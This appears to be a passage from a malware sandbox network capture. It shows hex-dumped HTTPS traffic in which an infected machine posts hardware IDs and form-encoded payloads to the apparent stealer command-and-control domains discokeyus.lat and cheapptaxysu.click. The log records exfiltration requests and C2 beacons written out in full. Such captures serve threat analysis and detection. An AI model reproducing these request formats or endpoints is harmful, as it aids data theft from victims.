                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 42 55 74 37 4e 69 71 70 30 65 54 5a 4f 65 78 78 33 4b 32 50 78 58 4c 6f 38 31 69 47 52 47 4b 6a 51 72 51 47 51 32 5a 6a 6a 31 4b 68 76 76 38 44 6d 51 6d 67 56 54 69 5a 7a 5a 45 59 33 50 75 30 6c 68 6a 7a 48 4f 4d 77 56 69 64 6d 56 43 66 33 6b 35 65 64 55 6f 46 2b 7a 6e 50 49 6e 65 45 42 4b 66 30 39 41 58 79 70 2f 79 53 47 43 4a 4e 4d 67 75 44 69 6b 7a 49 46 64 73 4d 47 77 30 39 54 55 65 34 50 41 78 6e 35 51 46 55 34 79 58 32 68 61 4d 78 37 49 4f 49 4d 67 2b 30 48 78 65 59 68 73 67 56 57 41 31 64 33 76 50 65 41 75 68 36 6e 47 66 6b 6b 38 45 78 70 76 53 47 49 6e 4d 76 55 31 6d 67 79 76 49 4c 67 41 76 50 54 64 44 59 6a 64 72 4f 75 63 79 47 75 6e 77 4f 4a 4f 58 43 6c 75 43 30 35 6c 62 6a 64 2f 79 46 69 36 70 4e 4d 4d 77 44 44 55 34 5a 56 6f 70 49 43 45 2b 2b
                                                                                                                                                                                                                                                              Data Ascii: BUt7Niqp0eTZOexx3K2PxXLo81iGRGKjQrQGQ2Zjj1Khvv8DmQmgVTiZzZEY3Pu0lhjzHOMwVidmVCf3k5edUoF+znPIneEBKf09AXyp/ySGCJNMguDikzIFdsMGw09TUe4PAxn5QFU4yX2haMx7IOIMg+0HxeYhsgVWA1d3vPeAuh6nGfkk8ExpvSGInMvU1mgyvILgAvPTdDYjdrOucyGunwOJOXCluC05lbjd/yFi6pNMMwDDU4ZVopICE++
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 38 50 4a 54 65 51 52 79 42 69 35 64 44 79 75 32 78 57 6d 32 43 65 2f 30 2f 43 43 77 2f 4d 77 56 34 64 33 68 35 38 6a 52 55 74 37 4d 38 6d 5a 59 4a 54 6f 6d 65 31 42 57 45 79 4c 64 42 5a 6f 67 35 78 54 6b 43 4b 54 4d 6d 53 47 4d 72 61 7a 6e 39 50 52 58 6c 2b 58 48 57 33 67 68 45 78 73 75 58 4b 70 33 4d 38 48 74 74 68 6a 66 50 4b 6b 59 39 64 6a 77 46 59 44 55 68 59 62 55 31 48 4f 72 32 50 70 6d 55 41 56 6d 4d 6e 39 38 56 69 64 57 39 53 6d 36 45 4d 63 49 78 43 43 59 77 4c 45 35 73 50 32 45 34 2f 33 68 61 72 2f 51 70 32 4d 5a 50 61 49 47 66 32 68 54 49 38 72 46 41 59 49 38 76 69 43 4e 49 4f 33 67 69 53 53 64 68 49 54 58 38 4f 42 2f 6c 39 7a 47 66 6b 77 70 66 67 5a 44 61 48 49 44 4a 74 55 70 69 67 54 54 4f 50 41 45 6d 50 54 64 41 62 6a 56 74 65 62 74 34 45 2f
                                                                                                                                                                                                                                                              Data Ascii: 8PJTeQRyBi5dDyu2xWm2Ce/0/CCw/MwV4d3h58jRUt7M8mZYJTome1BWEyLdBZog5xTkCKTMmSGMrazn9PRXl+XHW3ghExsuXKp3M8HtthjfPKkY9djwFYDUhYbU1HOr2PpmUAVmMn98VidW9Sm6EMcIxCCYwLE5sP2E4/3har/Qp2MZPaIGf2hTI8rFAYI8viCNIO3giSSdhITX8OB/l9zGfkwpfgZDaHIDJtUpigTTOPAEmPTdAbjVtebt4E/
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 33 67 68 51 78 73 75 58 45 6f 50 56 76 45 42 6e 68 54 2f 41 4f 77 67 76 4d 79 4e 4f 59 44 35 6e 4e 50 30 31 45 65 7a 79 4e 5a 4b 4d 44 46 65 4d 6e 74 31 62 78 49 65 31 56 69 37 51 65 65 38 77 4c 7a 49 6a 4e 31 4d 6e 4a 69 38 67 74 54 38 59 72 36 74 78 6d 35 45 47 55 34 36 62 32 42 53 4f 79 62 52 49 59 34 30 32 77 69 34 4f 4c 44 55 75 53 6d 77 72 59 54 54 78 4e 42 44 6e 2b 44 76 59 30 45 39 62 6e 74 4f 50 57 37 2f 4b 76 55 35 74 6e 6e 6e 58 63 68 39 69 50 79 6b 46 50 33 6c 74 4e 2f 55 33 47 4f 50 34 4f 5a 6d 53 41 56 75 44 6d 74 38 54 6d 4d 61 32 52 6d 2b 47 4e 73 6b 34 41 79 63 38 49 6b 46 68 4e 69 46 33 74 54 38 4d 72 36 74 78 74 37 6b 36 48 71 65 70 6c 77 54 45 33 76 4a 4a 59 73 68 68 69 44 41 46 4c 6a 41 71 51 32 34 31 61 7a 44 2b 4e 42 2f 72 2f 7a 69
                                                                                                                                                                                                                                                              Data Ascii: 3ghQxsuXEoPVvEBnhT/AOwgvMyNOYD5nNP01EezyNZKMDFeMnt1bxIe1Vi7Qee8wLzIjN1MnJi8gtT8Yr6txm5EGU46b2BSOybRIY402wi4OLDUuSmwrYTTxNBDn+DvY0E9bntOPW7/KvU5tnnnXch9iPykFP3ltN/U3GOP4OZmSAVuDmt8TmMa2Rm+GNsk4Ayc8IkFhNiF3tT8Mr6txt7k6HqeplwTE3vJJYshhiDAFLjAqQ241azD+NB/r/zi
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 59 65 56 78 52 79 44 31 62 78 44 59 59 41 78 77 54 30 43 4a 7a 55 6a 53 57 30 34 5a 6a 66 37 4d 46 53 68 73 7a 61 41 33 6c 63 63 70 34 50 4d 43 5a 7a 4b 6b 30 4e 68 79 43 61 47 4a 55 59 6c 4e 47 55 64 4a 7a 42 7a 50 66 67 71 48 65 6a 39 50 70 75 4d 44 6c 47 4e 67 64 41 55 6a 73 43 2b 53 47 47 4f 4f 4d 30 32 43 69 55 39 4c 6b 70 72 65 53 39 35 38 69 42 55 74 37 4d 66 6b 34 30 59 58 34 69 59 77 51 44 4b 32 50 78 58 4c 6f 38 31 69 47 52 47 49 54 4d 75 51 57 63 31 59 54 33 34 4f 41 62 67 39 44 61 52 6c 52 31 57 67 5a 54 63 45 34 48 49 74 46 78 69 68 69 76 4e 4c 68 52 69 64 6d 56 43 66 33 6b 35 65 63 4d 2f 42 50 2f 77 63 36 6d 49 44 45 71 4e 6e 74 74 62 6c 59 6d 72 44 6d 6d 45 65 5a 42 38 41 43 30 78 4a 6b 70 6d 4d 47 30 30 38 44 45 52 37 76 55 31 6b 70 51 50
                                                                                                                                                                                                                                                              Data Ascii: YeVxRyD1bxDYYAxwT0CJzUjSW04Zjf7MFShszaA3lccp4PMCZzKk0NhyCaGJUYlNGUdJzBzPfgqHej9PpuMDlGNgdAUjsC+SGGOOM02CiU9LkpreS958iBUt7Mfk40YX4iYwQDK2PxXLo81iGRGITMuQWc1YT34OAbg9DaRlR1WgZTcE4HItFxihivNLhRidmVCf3k5ecM/BP/wc6mIDEqNnttblYmrDmmEeZB8AC0xJkpmMG008DER7vU1kpQP
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 68 56 6b 34 65 31 51 69 37 51 65 63 73 37 42 53 4d 79 4c 45 6c 6f 50 6d 55 72 2f 7a 38 47 37 76 49 36 6c 5a 49 50 55 59 75 5a 31 68 4b 48 79 37 39 4a 61 59 63 38 69 48 4a 47 4a 53 42 6c 48 53 63 59 62 44 4c 35 59 30 36 76 37 48 2b 42 33 67 68 51 78 73 75 58 47 34 44 43 75 45 4e 74 68 7a 72 61 50 51 41 77 4f 43 68 50 64 54 4e 71 50 50 67 31 47 65 7a 31 4e 35 4f 53 48 56 57 47 6b 4e 78 62 78 49 65 31 56 69 37 51 65 65 73 72 45 43 67 2f 4b 56 4e 73 4f 47 49 76 2b 43 68 55 6f 62 4d 67 6e 34 39 50 42 4a 43 44 77 42 79 56 69 61 73 4f 61 59 52 35 6b 48 77 41 4b 7a 34 69 51 32 6b 72 5a 44 2f 36 4e 78 33 6d 39 7a 6d 62 6e 67 74 59 67 5a 62 55 46 34 48 41 73 55 46 71 67 54 66 42 4d 30 5a 73 65 43 4a 64 4a 32 45 68 47 4f 34 37 47 4f 4b 7a 4c 74 61 48 54 31 75 4b 30
                                                                                                                                                                                                                                                              Data Ascii: hVk4e1Qi7Qecs7BSMyLEloPmUr/z8G7vI6lZIPUYuZ1hKHy79JaYc8iHJGJSBlHScYbDL5Y06v7H+B3ghQxsuXG4DCuENthzraPQAwOChPdTNqPPg1Gez1N5OSHVWGkNxbxIe1Vi7QeesrECg/KVNsOGIv+ChUobMgn49PBJCDwByViasOaYR5kHwAKz4iQ2krZD/6Nx3m9zmbngtYgZbUF4HAsUFqgTfBM0ZseCJdJ2EhGO47GOKzLtaHT1uK0
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 66 38 6d 35 6c 6e 6a 7a 50 4b 6b 51 58 4f 79 74 4c 59 43 38 68 4a 73 70 32 56 4f 44 70 63 63 43 6e 46 68 79 42 6e 35 64 44 79 74 4b 31 54 6d 6d 53 4c 38 38 77 46 79 6b 31 4b 57 64 6f 50 6e 63 36 2b 6a 73 46 35 72 38 36 6c 64 35 42 48 49 47 4c 6c 30 50 4b 36 4c 56 59 62 61 63 36 32 54 56 47 62 48 67 69 55 79 64 68 49 51 65 31 4b 68 66 2f 38 44 36 4a 6f 45 38 45 6e 36 32 58 45 4a 7a 41 6f 6b 31 34 67 7a 54 45 4c 54 68 69 59 48 45 58 4e 57 73 7a 61 2b 70 34 43 39 43 39 63 5a 6e 65 56 32 57 66 30 38 46 62 30 70 58 38 44 6e 7a 49 59 59 68 37 42 54 41 71 49 30 5a 78 4f 69 59 48 79 78 38 43 35 66 51 68 6e 34 6b 41 48 4d 6a 54 32 46 76 53 2f 76 4a 48 61 5a 4d 6f 33 6a 45 57 4a 58 67 61 43 79 63 68 49 57 47 31 44 52 66 68 2f 54 61 4f 6a 30 4a 37 6b 4a 6e 51 43 34
                                                                                                                                                                                                                                                              Data Ascii: f8m5lnjzPKkQXOytLYC8hJsp2VODpccCnFhyBn5dDytK1TmmSL88wFyk1KWdoPnc6+jsF5r86ld5BHIGLl0PK6LVYbac62TVGbHgiUydhIQe1Khf/8D6JoE8En62XEJzAok14gzTELThiYHEXNWsza+p4C9C9cZneV2Wf08Fb0pX8DnzIYYh7BTAqI0ZxOiYHyx8C5fQhn4kAHMjT2FvS/vJHaZMo3jEWJXgaCychIWG1DRfh/TaOj0J7kJnQC4
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 59 63 51 33 77 7a 77 42 4d 69 34 2b 43 57 38 36 65 79 50 4c 42 6a 2f 6a 39 54 61 43 6d 51 6c 36 70 74 4f 5a 57 34 57 48 36 6e 63 75 77 48 6e 33 63 6b 59 36 65 48 30 46 55 6a 70 76 4e 2f 49 75 42 61 4c 62 45 71 4b 6b 54 58 43 42 68 70 55 76 6a 64 65 6a 52 57 4f 45 65 59 5a 38 41 47 4a 67 64 51 73 6e 50 58 42 35 72 57 68 47 74 4b 5a 69 7a 38 35 64 51 38 69 4b 6c 77 33 4b 6e 2b 41 41 4c 70 70 35 6b 48 78 42 49 53 6f 33 51 32 51 76 59 6e 37 4c 42 6a 50 68 39 44 43 4f 6a 68 68 54 75 4b 33 43 47 49 54 4a 74 56 68 2f 79 48 65 49 4d 30 5a 36 41 57 55 4e 4a 77 59 76 65 65 31 34 54 4b 2f 47 4d 70 61 51 43 45 71 58 33 76 41 56 6a 63 61 6b 58 6e 6d 48 65 59 5a 38 41 47 4a 67 64 77 73 6e 50 58 42 35 72 57 68 47 74 4b 5a 69 7a 38 35 64 51 38 69 4b 6c 77 33 4b 6e 2b 41
                                                                                                                                                                                                                                                              Data Ascii: YcQ3wzwBMi4+CW86eyPLBj/j9TaCmQl6ptOZW4WH6ncuwHn3ckY6eH0FUjpvN/IuBaLbEqKkTXCBhpUvjdejRWOEeYZ8AGJgdQsnPXB5rWhGtKZiz85dQ8iKlw3Kn+AALpp5kHxBISo3Q2QvYn7LBjPh9DCOjhhTuK3CGITJtVh/yHeIM0Z6AWUNJwYvee14TK/GMpaQCEqX3vAVjcakXnmHeYZ8AGJgdwsnPXB5rWhGtKZiz85dQ8iKlw3Kn+A
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1369INData Raw: 6f 6f 63 41 54 51 37 5a 51 73 6e 4e 53 46 68 74 54 6b 65 2f 2f 34 2b 6e 39 49 49 52 6f 48 54 6d 56 75 45 68 2b 6f 4f 62 34 49 70 78 54 4d 42 62 6a 34 72 53 79 63 6d 4c 79 43 31 4c 6c 53 33 6f 48 2f 59 6a 45 38 45 78 74 54 55 43 5a 6a 42 73 56 68 74 7a 77 66 32 45 52 51 6c 4b 43 59 48 56 6a 52 6c 4c 2b 41 37 42 4f 6a 4e 44 37 57 4d 43 45 79 46 30 65 59 4e 69 63 65 38 53 53 37 47 65 64 42 38 58 6d 49 56 4e 30 4a 33 4f 69 46 33 74 54 52 55 74 37 4d 38 69 70 6b 66 58 38 71 55 7a 52 7a 4b 32 50 78 58 4c 70 35 35 6b 47 39 49 59 69 70 6c 48 53 64 2b 62 7a 54 30 4f 78 72 73 34 53 4f 65 6e 52 6c 66 77 61 33 70 4e 70 6a 41 6f 6b 30 73 75 54 54 4d 4b 68 4d 68 4b 43 4a 37 57 52 52 7a 50 75 55 37 56 73 50 30 50 4a 53 67 4d 57 75 58 6c 4d 64 5a 72 4d 53 6b 54 53 37 47
                                                                                                                                                                                                                                                              Data Ascii: oocATQ7ZQsnNSFhtTke//4+n9IIRoHTmVuEh+oOb4IpxTMBbj4rSycmLyC1LlS3oH/YjE8ExtTUCZjBsVhtzwf2ERQlKCYHVjRlL+A7BOjND7WMCEyF0eYNice8SS7GedB8XmIVN0J3OiF3tTRUt7M8ipkfX8qUzRzK2PxXLp55kG9IYiplHSd+bzT0Oxrs4SOenRlfwa3pNpjAok0suTTMKhMhKCJ7WRRzPuU7VsP0PJSgMWuXlMdZrMSkTS7G


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              45192.168.2.450222104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:51 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=GFBG3WQUQUS3HI9FONC
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18169
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:51 UTC15331OUTData Raw: 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 46 42 47 33 57 51 55 51 55 53 33 48 49 39 46 4f 4e 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                              Data Ascii: --GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="pid"2--GFBG3WQUQUS3HI9FONCContent-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                              2024-12-22 01:18:51 UTC2838OUTData Raw: 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62
                                                                                                                                                                                                                                                              Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pyb
                                                                                                                                                                                                                                                              2024-12-22 01:18:52 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=lbsdp3q6p642i5na1436k675vj; expires=Wed, 16 Apr 2025 19:05:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spny2av9IMUxLGRJUSO93%2BA%2F2LZw1I7xDiqCQ4rBka4R3HwdVUx6umM%2BomDQAKwjfxR3NmJWeWo7HdHWjnQdN9G3Hk215lPHptIRw1fMNHiIwOWIMenui2WhAFjMOeCN%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47c5bd5a78d6-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1932&rtt_var=760&sent=16&recv=21&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19130&delivery_rate=1511387&cwnd=147&unsent_bytes=0&cid=380aeafe8aed2fd0&ts=988&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              46192.168.2.450238104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=CTKA333H
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8724
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC8724OUTData Raw: 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 54 4b 41 33 33 33 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                                                                                                                                                                              Data Ascii: --CTKA333HContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--CTKA333HContent-Disposition: form-data; name="pid"2--CTKA333HContent-Disposition: form-data; name="lid"PsFKDg--pablo--CTKA333HContent-Disposit
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ru5e1bqqmg812k661rn0b31djn; expires=Wed, 16 Apr 2025 19:05:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WgNLnpdY%2Bl%2F%2F%2FrfI1UZa5hjU54zMXsA1we75%2FzcovDF9kWR9raYenkxZhAc36%2Fpn2CF8CBDroX9aCitZgJX7cSiIEq%2BOH%2Blb2uHUpQF6qULkkVSyqlB0xdWSeCXazBMBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47d5cde341ff-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1581&rtt_var=602&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9651&delivery_rate=1803582&cwnd=240&unsent_bytes=0&cid=95f8bbe2f3780bcb&ts=822&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              47192.168.2.450240104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC564INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SSQSxv7PYjbu6zdvJ61%2FOvdzgJVvlHWxFLuiiY6PRfx2TI4q0Ktga0pdm1WdZgB%2BdVlBJbih4%2BYSeVsQ8B9h8KuG4vRFJqXTkwx4BtA3uPP%2FemmxuUhyVnLCO%2B8avts6eD46%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47d80cdb4385-EWR
                                                                                                                                                                                                                                                              2024-12-22 01:18:54 UTC805INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                              Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
